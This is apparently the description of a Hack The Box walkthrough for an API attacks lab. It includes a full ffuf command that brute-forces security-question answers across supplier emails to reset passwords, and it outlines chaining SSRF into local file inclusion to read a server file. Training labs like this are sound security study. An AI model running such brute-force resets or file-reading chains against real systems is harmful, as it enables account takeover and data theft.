Hack The Box: API Attacks Skill Assessment Walkthrough

Walkthrough of the API Attacks Skill Assessment on Hack The Box. ffuf script used: ffuf -u '/api/v2/authentication/suppliers/passwords/resets/security-question-answers' -X 'POST' -H 'accept: application/json' -H 'Content-Type: application/json' -d '{ "SupplierEmail": "EMAIL", "SecurityQuestionAnswer": "COLOUR", "NewPassword": "Test1234" }' -w colors.txt:COLOUR -w emails.txt:EMAIL -ic -fr 'false' This skill assessment applies the concepts covered in the module to retrieve the flag stored in file.txt on the target server. To accomplish this, we exploit a chained vulnerability, leveraging SSRF (Server-Side Request Forgery) to achieve LFI (Local File Inclusion). By manipulating the server's HTTP client into fetching a local file path rather than a remote URL, we are able to read the file's contents directly from the server's filesystem.